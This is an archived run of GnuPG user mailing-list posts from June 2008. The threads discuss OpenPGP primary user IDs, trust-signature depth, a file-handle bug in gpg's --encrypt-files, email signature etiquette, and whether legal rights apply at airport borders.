PGP? From rjh at sixdemonbag.org Sun Jun 15 23:22:49 2008 From: rjh at sixdemonbag.org (Robert J. Hansen) Date: Sun, 15 Jun 2008 16:22:49 -0500 Subject: PGP bug? Does not recognize primary uid In-Reply-To: <48557824.6050508@gmail.com> References: <48557824.6050508@gmail.com> Message-ID: <48558829.7060504@sixdemonbag.org> Jorgen Lysdal wrote: > I was just playing around with latest version of PGP (9.8.2) for Mac, > imported my key from gpg. It appears that PGP does not recognize what > uid is the primary one. It just shows the oldest first. Is there more > than one way to specify primary uid, or is it just one of the endless > waterfall of ridicules bugs in PGP? There are five answers here: (a) This is a PGP question, not a GnuPG question. (b) GnuPG is performing correctly. (c) PGP is performing correctly. (d) Implementations are given leeway in deciding how to interpret a primary userID. (e) This behavior is not a bug, much less a ridiculous one. From j.lysdal at gmail.com Mon Jun 16 16:11:04 2008 From: j.lysdal at gmail.com (Jorgen Lysdal) Date: Mon, 16 Jun 2008 16:11:04 +0200 Subject: PGP bug? Does not recognize primary uid In-Reply-To: <48558829.7060504@sixdemonbag.org> References: <48557824.6050508@gmail.com> <48558829.7060504@sixdemonbag.org> Message-ID: <48567478.4020201@gmail.com> Robert J. Hansen wrote: > There are five answers here: > > (a) This is a PGP question, not a GnuPG question. So any question on compatibility should be sent to the PGP forum? :) > (b) GnuPG is performing correctly. > (c) PGP is performing correctly. Great.. > (d) Implementations are given leeway in deciding how to interpret a > primary userID. Interesting. I assume there is a good reason for this? I mean, does it not defeat the purpose of primary uid?s if they are not recognized between different software? > (e) This behavior is not a bug, much less a ridiculous one. Well, at the time it was absolutely clear to me that it was a bug in PGP, since it would just be another one on the list(And yes, many of the bugs in PGP are ridiculous) Guess i was just wrong on this one. From rjh at sixdemonbag.org Mon Jun 16 17:23:17 2008 From: rjh at sixdemonbag.org (Robert J. Hansen) Date: Mon, 16 Jun 2008 10:23:17 -0500 Subject: PGP bug? Does not recognize primary uid In-Reply-To: <48567478.4020201@gmail.com> References: <48557824.6050508@gmail.com> <48558829.7060504@sixdemonbag.org> <48567478.4020201@gmail.com> Message-ID: <48568565.10609@sixdemonbag.org> Jorgen Lysdal wrote: > So any question on compatibility should be sent to the PGP forum? :) No. If you have a key created in PGP that's not working in GnuPG, by all means, ask here "hey, what's going on?" If you have a key created in GnuPG that's not working in PGP, you should probably be asking there. Or, generally speaking, ask the people who have detailed interior knowledge of the system which appears to not be working right. > Interesting. I assume there is a good reason for this? I mean, does it > not defeat the purpose of primary uid?s if they are not recognized > between different software? No, it doesn't defeat the purpose of a primary UID. Which UID is "primary" is strictly a matter for the convenience of human beings. OpenPGP doesn't draw that distinction. It's totally irrelevant to the system. The totality of the OpenPGP language on user IDs is such: 5.2.3.19. Primary User ID (1 octet, Boolean) This is a flag in a User ID's self-signature that states whether this User ID is the main User ID for this key. It is reasonable for an implementation to resolve ambiguities in preferences, etc. by referring to the primary User ID. If this flag is absent, its value is zero. If more than one User ID in a key is marked as primary, the implementation may resolve the ambiguity in any way it sees fit, but it is RECOMMENDED that priority be given to the User ID with the most recent self-signature. When appearing on a self-signature on a User ID packet, this subpacket applies only to User ID packets. When appearing on a self-signature on a User Attribute packet, this subpacket applies only to User Attribute packets. That is to say, there are two different and independent "primaries" -- one for User IDs, and one for User Attributes. ... There are a couple of other quick offhanded references (packet specifiers, one reference to how a symmetric algorithm may be chosen, etc.), but that's the meat of it. There is no MUST anywhere in that paragraph. Implementations are therefore free to do whatever they like with it, including ignore your preference and arbitrarily say "okay, we're going to treat this other one as your primary". From wk at gnupg.org Mon Jun 16 17:31:42 2008 From: wk at gnupg.org (Werner Koch) Date: Mon, 16 Jun 2008 17:31:42 +0200 Subject: PGP bug? Does not recognize primary uid In-Reply-To: <48567478.4020201@gmail.com> (Jorgen Lysdal's message of "Mon, 16 Jun 2008 16:11:04 +0200") References: <48557824.6050508@gmail.com> <48558829.7060504@sixdemonbag.org> <48567478.4020201@gmail.com> Message-ID: <87zlpl4crl.fsf@wheatstone.g10code.de> On Mon, 16 Jun 2008 16:11, j.lysdal at gmail.com said: > Well, at the time it was absolutely clear to me that it was a bug in > PGP, since it would just be another one on the list(And yes, many of the > bugs in PGP are ridiculous) Guess i was just wrong on this one. The RFC states this: 5.2.3.19. Primary User ID (1 octet, Boolean) This is a flag in a User ID's self-signature that states whether this User ID is the main User ID for this key. It is reasonable for an implementation to resolve ambiguities in preferences, etc. by referring to the primary User ID. If this flag is absent, its value [...] Thus there is no requirement to care about this flag. Nevertheless it is a pretty useful information and in particular useful if you are able to change algorithm preferences - without that flag there would be no clean way to keep one user IDs displayed first. Salam-Shalom, Werner -- Die Gedanken sind frei. Auschnahme regelt ein Bundeschgesetz. From j.lysdal at gmail.com Mon Jun 16 17:51:42 2008 From: j.lysdal at gmail.com (Jorgen Lysdal) Date: Mon, 16 Jun 2008 17:51:42 +0200 Subject: PGP bug? Does not recognize primary uid In-Reply-To: <48568565.10609@sixdemonbag.org> References: <48557824.6050508@gmail.com> <48558829.7060504@sixdemonbag.org> <48567478.4020201@gmail.com> <48568565.10609@sixdemonbag.org> Message-ID: <48568C0E.7010701@gmail.com> Robert J. Hansen wrote: > Jorgen Lysdal wrote: >> So any question on compatibility should be sent to the PGP forum? :) > > No. If you have a key created in PGP that's not working in GnuPG, by > all means, ask here "hey, what's going on?" > > If you have a key created in GnuPG that's not working in PGP, you should > probably be asking there. > > Or, generally speaking, ask the people who have detailed interior > knowledge of the system which appears to not be working right. I get what you are saying, my fault. However, to the answers you gave to my question, the implementations does not really matter. > No, it doesn't defeat the purpose of a primary UID. Which UID is > "primary" is strictly a matter for the convenience of human beings. > OpenPGP doesn't draw that distinction. It's totally irrelevant to the > system. > > The totality of the OpenPGP language on user IDs is such: > > > 5.2.3.19. Primary User ID > > (1 octet, Boolean) > > This is a flag in a User ID's self-signature that states whether this > User ID is the main User ID for this key. It is reasonable for an > implementation to resolve ambiguities in preferences, etc. by > referring to the primary User ID. If this flag is absent, its value > is zero. If more than one User ID in a key is marked as primary, the > implementation may resolve the ambiguity in any way it sees fit, but > it is RECOMMENDED that priority be given to the User ID with the most > recent self-signature. > > When appearing on a self-signature on a User ID packet, this > subpacket applies only to User ID packets. When appearing on a > self-signature on a User Attribute packet, this subpacket applies > only to User Attribute packets. That is to say, there are two > different and independent "primaries" -- one for User IDs, and one > for User Attributes. > > > ... There are a couple of other quick offhanded references (packet > specifiers, one reference to how a symmetric algorithm may be chosen, > etc.), but that's the meat of it. > > There is no MUST anywhere in that paragraph. Implementations are > therefore free to do whatever they like with it, including ignore your > preference and arbitrarily say "okay, we're going to treat this other > one as your primary". > > Got it! Thanks From ivan.peev at gmail.com Sun Jun 15 17:36:47 2008 From: ivan.peev at gmail.com (Ivan Peev) Date: Sun, 15 Jun 2008 11:36:47 -0400 Subject: Remove public key from secret key In-Reply-To: <48551C98.3070809@digitalbrains.com> References: <48551C98.3070809@digitalbrains.com> Message-ID: Thank you for the verbose answer Peter. What I actually ended up doing is simply signing the required data with a private key and verifying the signed data with the public key on the exposed machine. I realized I don't need encryption, but a way to guarantee the data is generated by me. Thank you again for your time. Regards, Ivan On Sun, Jun 15, 2008 at 9:43 AM, Peter Lebbing wrote: > Ivan Peev wrote: > > Is there a way to export the secret key without the public key or remove > > the public key from exported secret key? I'm trying the following > scenario: > > > > 1. Encrypt data with particular public key on one machine. > > 2. Decrypt data with related secret key on another machine. > > > > Basically I don't want someone to be able to generate data, which can be > > decrypted with the related secret key. > > At least with RSA, the public key can be computed with just the secret key. > So it would never be cryptographically secure, it only takes some effort on > the part of the attacker to break the scheme. > > I obviously don't know your exact requirements, but instead of trying to > make something designed to be public private, perhaps this will accomplish > your goal: > > Create two keypairs, A and B. > > The machine mentioned under point 1. above has the public key of keypair A > and the private key of keypair B. > > The machine mentioned under point 2. has the private key A and public key > B. > > The program encrypting on machine 1. encrypts to key A and signs with key > B. > > The program decrypting on machine 2. only accepts data encrypted to key A > and /signed with key B/. > > Now someone with access to the keyring on machine 2. cannot create > encrypted > data that is accepted by the decryption program, because he cannot sign it > with key B. > > HTH, > > Peter Lebbing. > > -- > I'm using the GNU Privacy Guard (GnuPG) in combination with Enigmail. > You can send me encrypted mail if you want some privacy. > My key is available at http://wwwhome.ewi.utwente.nl/~lebbing/pubkey.txt > -------------- next part -------------- An HTML attachment was scrubbed... URL: From hv at tbz-pariv.de Mon Jun 16 10:24:56 2008 From: hv at tbz-pariv.de (Thomas Guettler) Date: Mon, 16 Jun 2008 10:24:56 +0200 Subject: Bug: --encrpyt-files: too many open files Message-ID: <48562358.8060201@tbz-pariv.de> Hi, there is a bug in 2.0.4: find -type f | LANG=C gpg -r someid --homedir ~/... --encrypt-files ... gpg: encryption of `/home/a/.../myfileN' failed: Too many open files You can look at the stale open files under Linux (The encryption process must be still running): ls -l /proc/PID/fd lr-x------ 1 a a 64 16. Jun 10:14 97 -> /home/a/.../myfile1 lr-x------ 1 a a 64 16. Jun 10:14 98 -> /home/a/.../myfile2 ... gpg (GnuPG) 2.0.4-svn0 (SuSE 10.3) Can someone check if this happens in the latest release, too? Please CC to me, I am not on the list. Thomas -- Thomas Guettler, http://www.thomas-guettler.de/ From rick at rickv.com Mon Jun 16 19:01:23 2008 From: rick at rickv.com (Rick Valenzuela) Date: Mon, 16 Jun 2008 13:01:23 -0400 Subject: passphrases: the police and subkeys scenario In-Reply-To: <48555FF8.8060705@gmail.com> References: <48502A51.5030804@rickv.com> <20080613193920.GA4107@jabberwocky.com> <4854BCE4.7080204@rickv.com> <48555FF8.8060705@gmail.com> Message-ID: <48569C63.2010401@rickv.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Faramir wrote: | Well, I suppose in most "civilized" countries you have the right to | have access to a lawyer if you have legal troubles. But is it a good | idea to keep in mind there are places where that is unlikely to work... Ah, and there's the fatal flaw -- not the part about "civilized" countries, but simply "country." Airport immigration and customs is viewed as outside the borders, a middle ground where the laws of the destination nation don't apply. Rick - -- Rick Valenzuela photographer | reporter +1 267 694 3642 | www.rickv.com GnuPG ID: 0xD5644029 rickv.com/publickey.txt -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.8 (Darwin) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iF4EAREKAAYFAkhWnGIACgkQhHTA8gi5MvCEDQD/XgeNrHeuQO2H6N3VP2eoxWfH x0LNBpqn0aIfPJo7e1cA/0YLQQTD1DSAErdmnSQAO7C5dHI5LE23MEerkGiSFF0J =ggIG -----END PGP SIGNATURE----- From rjh at sixdemonbag.org Mon Jun 16 19:57:47 2008 From: rjh at sixdemonbag.org (Robert J. Hansen) Date: Mon, 16 Jun 2008 12:57:47 -0500 Subject: passphrases: the police and subkeys scenario In-Reply-To: <48569C63.2010401@rickv.com> References: <48502A51.5030804@rickv.com> <20080613193920.GA4107@jabberwocky.com> <4854BCE4.7080204@rickv.com> <48555FF8.8060705@gmail.com> <48569C63.2010401@rickv.com> Message-ID: <4856A99B.5010406@sixdemonbag.org> Rick Valenzuela wrote: > Ah, and there's the fatal flaw -- not the part about "civilized" > countries, but simply "country." Airport immigration and customs is > viewed as outside the borders, a middle ground where the laws of the > destination nation don't apply. [sighs] This is not true. There is no "middle ground" at borders. It is still the land of whatever sovereign nation it stands upon. That sovereign nation may, for purposes of its own domestic law, treat the airport differently than surrounding areas -- but it's grossly inaccurate to say that an airport is beyond the laws of the host country. From rick at rickv.com Mon Jun 16 20:30:40 2008 From: rick at rickv.com (Rick Valenzuela) Date: Mon, 16 Jun 2008 14:30:40 -0400 Subject: passphrases: the police and subkeys scenario In-Reply-To: <4856A99B.5010406@sixdemonbag.org> References: <48502A51.5030804@rickv.com> <20080613193920.GA4107@jabberwocky.com> <4854BCE4.7080204@rickv.com> <48555FF8.8060705@gmail.com> <48569C63.2010401@rickv.com> <4856A99B.5010406@sixdemonbag.org> Message-ID: <4856B150.4020704@rickv.com> Robert J. Hansen wrote: > it's grossly inaccurate to say that an airport > is beyond the laws of the host country. I said it's "viewed as." It's an interpretation and being taken advantage of as such. I might've tended toward hyperbole and implied an uncivilized Wild West of airports, but for some specific instances, yes, basic expected rights are sometimes no longer operable pre-entry. For instance, in the U.S., if a non-citizen is being questioned about entry status, he or she is not entitled to have an attorney present. (A U.S. citizen is, for any questioning.) Yet, if a noncitizen is detained in the city, he can have a lawyer present for questioning by police. From rick at rickv.com Mon Jun 16 21:30:32 2008 From: rick at rickv.com (Rick Valenzuela) Date: Mon, 16 Jun 2008 15:30:32 -0400 Subject: info in sigs, comments and header Message-ID: <4856BF58.9030400@rickv.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 I have a question about style, etiquette, and practicality with disseminating GnuPG info in an email. Hope this question isn't too silly, but I assume that over years of use, general customs have developed, and I have no idea what they are. Is there any customary practice for including GnuPG/PGP information in an email -- whether to put it in your sig file, or in the comments of your GnuPG signature? Is it useful (or preferred) to have the GnuPG version in the GnuPG signature comment, or frowned on to use/not use the comment from Enigmail or FireGPG? I'm playing around with my email sig now, wondering what to include, but aiming for something short, useful and not redundant or "tacky." It feels silly to put my keyID and a URL to my public key there and also have it tucked away nicely in the header, but who looks in headers? (For all I know, having that in header information is useful for other people's spam filters.) I had a link to my public key in the GnuPG signature comment, but then just moved it to my sig. I made a DSA signing key partly because I wanted a relatively short signature, so I thought it was better to leave that block mess as short as possible. I didn't include a fingerprint, figuring instead to put that on new business cards. I did do a search for this, and the best I found dealt mainly with forum postings and lists: http://marc.info/?l=gnupg-users&m=99530793817456&w=2 What are your practices for this? Is anything seen as useless or gauche? Rick - -- Rick Valenzuela photographer | reporter +1 267 694 3642 | www.rickv.com GnuPG ID: 0xD5644029 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.8 (Darwin) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iF4EAREKAAYFAkhWv1gACgkQhHTA8gi5MvBDHQEAy19nTXjrn3WThj8deVU5rhls 8w6xRsVff9+Ii7KsgcEA/R4P881K7uSFqUnU1ZO49JdzAS6pOsrDv962S+LClzaM =zjJm -----END PGP SIGNATURE----- From rjh at sixdemonbag.org Mon Jun 16 21:37:20 2008 From: rjh at sixdemonbag.org (Robert J. Hansen) Date: Mon, 16 Jun 2008 14:37:20 -0500 Subject: passphrases: the police and subkeys scenario In-Reply-To: <4856B150.4020704@rickv.com> References: <48502A51.5030804@rickv.com> <20080613193920.GA4107@jabberwocky.com> <4854BCE4.7080204@rickv.com> <48555FF8.8060705@gmail.com> <48569C63.2010401@rickv.com> <4856A99B.5010406@sixdemonbag.org> <4856B150.4020704@rickv.com> Message-ID: <4856C0F0.9070306@sixdemonbag.org> Rick Valenzuela wrote: > I said it's "viewed as." It's an interpretation and being taken > advantage of as such. I might've tended toward hyperbole and implied an > uncivilized Wild West of airports, but for some specific instances, yes, > basic expected rights are sometimes no longer operable pre-entry. Keeping this jurisdiction-free, the legal protections people think they should have and the legal protections they think they have and the legal protections they actually have are three quite disjoint subject areas. It pays to keep this in mind when making statements. Clarity is important when discussing things. Without clarity, the process of reasoning is stymied. My objection is not to your political beliefs or your ideas about what rights are possessed by Americans. My objection is strictly one of clarity. From rjh at sixdemonbag.org Mon Jun 16 21:44:06 2008 From: rjh at sixdemonbag.org (Robert J. Hansen) Date: Mon, 16 Jun 2008 14:44:06 -0500 Subject: info in sigs, comments and header In-Reply-To: <4856BF58.9030400@rickv.com> References: <4856BF58.9030400@rickv.com> Message-ID: <4856C286.6000100@sixdemonbag.org> Rick Valenzuela wrote: > Is there any customary practice for including GnuPG/PGP information in > an email -- whether to put it in your sig file, or in the comments of > your GnuPG signature? Is it useful (or preferred) to have the GnuPG > version in the GnuPG signature comment, or frowned on to use/not use the > comment from Enigmail or FireGPG? If you use Enigmail, you can tell Enigmail to add an email header indicating your OpenPGP key id. This seems to be about as low-intrusive a method as any. > but who looks in headers? Technically savvy people -- which happens to be the same demographic which tends to use OpenPGP, unfortunately enough. OpenPGP's penetration into the layman's world of computing is practically nil. > What are your practices for this? Is anything seen as useless or gauche? A brief "OpenPGP: 0xDEADBEEF" is probably not going to get you any hate mail. I run my key fingerprint across the bottom of my business cards. That way when I meet someone, we trade information and they now have a trusted copy of my fingerprint, delivered directly from my hand. Since I work in a very technical field, most people who get my card understand what it is -- it's been a conversational icebreaker at several conventions. It's also very handy for impromptu keysigning parties. A couple of weeks ago I was sitting in a coffeeshop with a Canadian doctoral student in CS, a sysadmin for kernel.org, and a couple of fellow voting researchers. I put my passport and a stack of business cards on the table, and presto, everyone had the opportunity to confirm my identity and get a copy of my fingerprint. It was a lot more convenient than if I'd had to say "hold on a second...", boot up my laptop, grab a stack of napkins, and laboriously hand-copy my fingerprint from a terminal window onto napkins again and again for each person who was sitting at the table. From george.davidescu at gmail.com Mon Jun 16 22:14:52 2008 From: george.davidescu at gmail.com (bezna) Date: Mon, 16 Jun 2008 13:14:52 -0700 (PDT) Subject: Questions about trust signatures In-Reply-To: <20080613214255.GD4107@jabberwocky.com> References: <17789248.post@talk.nabble.com> <20080613214255.GD4107@jabberwocky.com> Message-ID: <17872484.post@talk.nabble.com> Dear David, First, thank you for your reply and for the working link to the white paper. You have my enormous gratitude for taking the time to share your knowledge with me. David Shaw wrote: > >> Furthermore, if Bob tsigned Carmen with a depth of 4 (for his own >> purposes), the chain of trust linking Eve to Alice would be broken >> since GPG computes certificate validity (and trust in the case of >> tsigns) only down paths where each next node in the path was tsigned >> with a lower ???depth??? than the ???depth??? of the tsign on the >> node before it. > > The chain isn't broken, the depth at each step is just lowered to > match the perspective of the head of the chain (Alice in this case). > If Bob tsigns Carmen, then from Bob's perspective, that chain in the > link had a depth of 4. Similarly, if Roger signs Bob's key with a > depth of 5, then we have a new chain from Roger's perspective where > the Bob->Carmen link also has a depth of 4. If Roger signed Bob's key > with a depth of 4, then the Bob->Carmen link has a depth of 3 (as it > is lowered to match the maximum depth granted by Roger). If Roger > signed Bob's key with a depth of 50, then the Bob->Carmen link has a > depth of 4 (as it can't be larger than what Bob granted). > I believe you might be mistaken on this point. I ran some trials and it seems that if the next trust signature in the chain has a higher depth than the one preceding it, it is treated just as a regular signature (depth 0) and the trust data contained in the signature is discarded, effectively breaking the chain. The next hop in the chain will have an appropriate trust value of "undefined", and the one following it will simply be "unknown". See for yourself: A nice "continuous" chain of tsigs of descending order: ------------------------------------------- pub 1024D/B2D7B73D 2008-06-10 uid [ultimate] Alice sig 3 B2D7B73D 2008-06-10 Alice sub 2048g/D4380BAE 2008-06-10 sig B2D7B73D 2008-06-10 Alice pub 1024D/87E9321A 2008-06-10 uid [ full ] Bobby sig 3 87E9321A 2008-06-10 Bobby sig 3 3 B2D7B73D 2008-06-16 Alice sub 2048g/E88071D6 2008-06-10 sig 87E9321A 2008-06-10 Bobby pub 1024D/0C73E6E9 2008-06-10 uid [ full ] Carlos sig 3 0C73E6E9 2008-06-10 Carlos sig 3 2 87E9321A 2008-06-16 Bobby sub 2048g/4EE6F059 2008-06-10 sig 0C73E6E9 2008-06-10 Carlos pub 1024D/026D69FA 2008-06-10 uid [ full ] David sig 3 026D69FA 2008-06-10 David sig 3 1 0C73E6E9 2008-06-16 Carlos sub 2048g/D9A7D20C 2008-06-10 sig 026D69FA 2008-06-10 David pub 1024D/1D764C2F 2008-06-10 uid [ full ] Elena sig 3 1D764C2F 2008-06-10 Elena sig 3 026D69FA 2008-06-16 David sub 2048g/8829A23F 2008-06-10 sig 1D764C2F 2008-06-10 Elena And now a chain with a tsig of 4 at the Bobby==>Carlos link, as described in the earlier post, which apparently generates an interruption in the chain of trust: ---------------------------------------- pub 1024D/B2D7B73D 2008-06-10 uid [ultimate] Alice sig 3 B2D7B73D 2008-06-10 Alice sub 2048g/D4380BAE 2008-06-10 sig B2D7B73D 2008-06-10 Alice pub 1024D/87E9321A 2008-06-10 uid [ full ] Bobby sig 3 87E9321A 2008-06-10 Bobby sig 3 3 B2D7B73D 2008-06-16 Alice sub 2048g/E88071D6 2008-06-10 sig 87E9321A 2008-06-10 Bobby pub 1024D/0C73E6E9 2008-06-10 uid [ full ] Carlos sig 3 0C73E6E9 2008-06-10 Carlos sig 3 4 87E9321A 2008-06-16 Bobby sub 2048g/4EE6F059 2008-06-10 sig 0C73E6E9 2008-06-10 Carlos pub 1024D/026D69FA 2008-06-10 uid [ undef ] David sig 3 026D69FA 2008-06-10 David sig 3 1 0C73E6E9 2008-06-16 Carlos sub 2048g/D9A7D20C 2008-06-10 sig 026D69FA 2008-06-10 David pub 1024D/1D764C2F 2008-06-10 uid [ unknown] Elena sig 3 1D764C2F 2008-06-10 Elena sig 3 026D69FA 2008-06-16 David sub 2048g/8829A23F 2008-06-10 sig 1D764C2F 2008-06-10 Elena Curious stuff. What do you think? George -- View this message in context: http://www.nabble.com/Questions-about-trust-signatures-tp17789248p17872484.html Sent from the GnuPG - User mailing list archive at Nabble.com. From rick at rickv.com Mon Jun 16 22:21:25 2008 From: rick at rickv.com (Rick Valenzuela) Date: Mon, 16 Jun 2008 16:21:25 -0400 Subject: passphrases: the police and subkeys scenario In-Reply-To: <4856C0F0.9070306@sixdemonbag.org> References: <48502A51.5030804@rickv.com> <20080613193920.GA4107@jabberwocky.com> <4854BCE4.7080204@rickv.com> <48555FF8.8060705@gmail.com> <48569C63.2010401@rickv.com> <4856A99B.5010406@sixdemonbag.org> <4856B150.4020704@rickv.com> <4856C0F0.9070306@sixdemonbag.org> Message-ID: <4856CB45.7070308@rickv.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Robert J. Hansen wrote: | Keeping this jurisdiction-free, the legal protections people think they | should have and the legal protections they think they have and the legal | protections they actually have are three quite disjoint subject areas. | It pays to keep this in mind when making statements. | | My objection is not to your political beliefs or your ideas about what | rights are possessed by Americans. My objection is strictly one of clarity. Sorry for the confusion. Clarity is good, yes, but what I was saying is that practicality is good, too. Add to the disjointed subject areas the legal protections that people are going to get. Those could differ because some areas are unwritten as law or regulation, or various interpretations of existing law have not been fully tested in court. I wasn't trying to push my politics. I was just highlighting that a gray area could exist, and that this kind of interpretation is not limited to whether a country is civilized or not. Rick - -- Rick Valenzuela photographer | reporter +1 267 694 3642 | www.rickv.com GnuPG ID: 0xD5644029 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.8 (Darwin) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iF4EAREKAAYFAkhWy0QACgkQhHTA8gi5MvDc7wEAmMUYGychjDYNrnetZynzf+3+ YGr02YUmfm7J0+yE9d0A/3uJZZZKpeTJk44x0TSQZWW4fzrwboPUwpUOx/+BAupg =kcgq -----END PGP SIGNATURE----- From dshaw at jabberwocky.com Mon Jun 16 23:02:12 2008 From: dshaw at jabberwocky.com (David Shaw) Date: Mon, 16 Jun 2008 17:02:12 -0400 Subject: Questions about trust signatures In-Reply-To: <17872484.post@talk.nabble.com> References: <17789248.post@talk.nabble.com> <20080613214255.GD4107@jabberwocky.com> <17872484.post@talk.nabble.com> Message-ID: <20080616210212.GB14148@jabberwocky.com> On Mon, Jun 16, 2008 at 01:14:52PM -0700, bezna wrote: > > Dear David, > > First, thank you for your reply and for the working link to the white paper. > You have my enormous gratitude for taking the time to share your knowledge > with me. > > > David Shaw wrote: > > > >> Furthermore, if Bob tsigned Carmen with a depth of 4 (for his own > >> purposes), the chain of trust linking Eve to Alice would be broken > >> since GPG computes certificate validity (and trust in the case of > >> tsigns) only down paths where each next node in the path was tsigned > >> with a lower ???depth??? than the ???depth??? of the tsign on the > >> node before it. > > > > The chain isn't broken, the depth at each step is just lowered to > > match the perspective of the head of the chain (Alice in this case). > > If Bob tsigns Carmen, then from Bob's perspective, that chain in the > > link had a depth of 4. Similarly, if Roger signs Bob's key with a > > depth of 5, then we have a new chain from Roger's perspective where > > the Bob->Carmen link also has a depth of 4. If Roger signed Bob's key > > with a depth of 4, then the Bob->Carmen link has a depth of 3 (as it > > is lowered to match the maximum depth granted by Roger). If Roger > > signed Bob's key with a depth of 50, then the Bob->Carmen link has a > > depth of 4 (as it can't be larger than what Bob granted). > > > > I believe you might be mistaken on this point. I ran some trials and it > seems that if the next trust signature in the chain has a higher depth than > the one preceding it, it is treated just as a regular signature (depth 0) > and the trust data contained in the signature is discarded, effectively > breaking the chain. The next hop in the chain will have an appropriate trust > value of "undefined", and the one following it will simply be "unknown". See > for yourself: Interesting. I'm going to have to go back to my notes from when I wrote that code back in 2002, and see what I was shooting for. My memory is that I wanted the trust depth to automatically degrade as the chain continued. It's possible this is just a bug, or it is possible I did it this way on purpose (PGP compatibility, maybe?) I'll let you know what I find. David From faramir.cl at gmail.com Tue Jun 17 06:02:45 2008 From: faramir.cl at gmail.com (Faramir) Date: Tue, 17 Jun 2008 00:02:45 -0400 Subject: passphrases: the police and subkeys scenario In-Reply-To: <4856B150.4020704@rickv.com> References: <48502A51.5030804@rickv.com> <20080613193920.GA4107@jabberwocky.com> <4854BCE4.7080204@rickv.com> <48555FF8.8060705@gmail.com> <48569C63.2010401@rickv.com> <4856A99B.5010406@sixdemonbag.org> <4856B150.4020704@rickv.com> Message-ID: <48573765.4070101@gmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Rick Valenzuela escribi?: > Robert J. Hansen wrote: >> it's grossly inaccurate to say that an airport >> is beyond the laws of the host country. > > I said it's "viewed as." It's an interpretation and being taken > advantage of as such. I might've tended toward hyperbole and implied an > uncivilized Wild West of airports, but for some specific instances, yes, > basic expected rights are sometimes no longer operable pre-entry. > > For instance, in the U.S., if a non-citizen is being questioned about > entry status, he or she is not entitled to have an attorney present. (A > U.S. citizen is, for any questioning.) Yet, if a noncitizen is detained > in the city, he can have a lawyer present for questioning by police. I don't have any idea how does it operate in my country, I mean, how does it work at the international airport. Also, there are interpol agents there, and I am not sure how do they treat jurisdiction. Anyway, I still remember when a chilean passenger was required to put his handbag with the other luggage (this was after sept 11, 2001), and he said something like "ok, no problem, I still have my machine-gun in my pocket" (a very stupid joke to do, in a time like that, but still it was clearly a joke... there is no way to put a machine-gun inside a pocket). And he spent several days arrested... So, IMHO, nothing that can happen inside USA regarding "security" amazes me. Anyway, regarding encryption and legal issues, I think we should not focus "only" in extreme situations, without forgetting too that there are places where "weird" (or unpleasant) things can happen. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQEcBAEBAgAGBQJIVzdkAAoJEMV4f6PvczxATPkH/RsA8DhdnPFgrWWr1UuDPvxC gVMqgJKl8ozwPq+uo44fhc8kUPkd4aBbwBwsWYdzoR+hqh7IUsn5VwyXxG37Wyn4 VVjFm/dBSfEl/vzPluwgaebefYzkJphjburhn1HwkmhLx3xI51CzDJjFf2fWC8H1 ULIec74l8dzEHJ+jRPE6oRvu0LvM4q9+cFiZN6fXNiZclgOn5dbVH/8kIJPXQ586 Tbc5cVzWSr5EH9MfvH5VDYMtTlIA6VuWLB5C3EjfQs907IDRfz0TOFaK1Q5le5m6 jblWkc12xpgl1etqTkdCVKRlwxdAi0/B3ytayyNM4f1sIrCSC8Jxs6sLKkJeMgg= =pWrs -----END PGP SIGNATURE----- From faramir.cl at gmail.com Tue Jun 17 06:37:24 2008 From: faramir.cl at gmail.com (Faramir) Date: Tue, 17 Jun 2008 00:37:24 -0400 Subject: passphrases: the police and subkeys scenario In-Reply-To: <4856CB45.7070308@rickv.com> References: <48502A51.5030804@rickv.com> <20080613193920.GA4107@jabberwocky.com> <4854BCE4.7080204@rickv.com> <48555FF8.8060705@gmail.com> <48569C63.2010401@rickv.com> <4856A99B.5010406@sixdemonbag.org> <4856B150.4020704@rickv.com> <4856C0F0.9070306@sixdemonbag.org> <4856CB45.7070308@rickv.com> Message-ID: <48573F84.7030901@gmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Rick Valenzuela escribi?: > Robert J. Hansen wrote: > | Keeping this jurisdiction-free, the legal protections people think they > | should have and the legal protections they think they have and the legal > | protections they actually have are three quite disjoint subject areas. > | It pays to keep this in mind when making statements. > | > | My objection is not to your political beliefs or your ideas about what > | rights are possessed by Americans. My objection is strictly one of > clarity. > > > Sorry for the confusion. Clarity is good, yes, but what I was saying is > that practicality is good, too. Add to the disjointed subject areas the > legal protections that people are going to get. Those could differ > because some areas are unwritten as law or regulation, or various > interpretations of existing law have not been fully tested in court. > > I wasn't trying to push my politics. I was just highlighting that a gray > area could exist, and that this kind of interpretation is not limited to > whether a country is civilized or not. Ok, I get the point. Also, I mentioned the word "civilized" trying to not imply countries which doesn't grant the right to have an attorney's services are not civilized... that is the reason why I used the "" signs. Regards -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQEcBAEBAgAGBQJIVz+EAAoJEMV4f6PvczxAKxIH/jyQFpL8I2XuRz/eA1Hv13hZ E6Vc3ziR/gxlqb6zdSA0iIEnCAH6d/6yYJeOpQEpZ1EPUeZWIjvSdEuC1r6fQIPV Uj2TNzmH3dGFPq7H78LkBkEWLueyTjozgsjIp4pseSRnlqJv5sk4FZ4j9h8Rzuau TZo2Md2CIouYAR+307rZMpN6IM2Re6lxovc3hmf58pq0AQIf2JpU+bgXGjbTWih2 UiGwZksXZKGuKSsl7y35OZ6pmBgcOYHi0d48TVxfKnoF6aJh5AqwaiOFwAynsQMO 7CplOh5Z/XCwNTkRYj9OvwBSvDeJePzFOmI96qWO8dH2nagdK5cIucCPsmha7X8= =zeuh -----END PGP SIGNATURE----- From faramir.cl at gmail.com Tue Jun 17 10:34:52 2008 From: faramir.cl at gmail.com (Faramir) Date: Tue, 17 Jun 2008 04:34:52 -0400 Subject: I saw this strange thing... Message-ID: 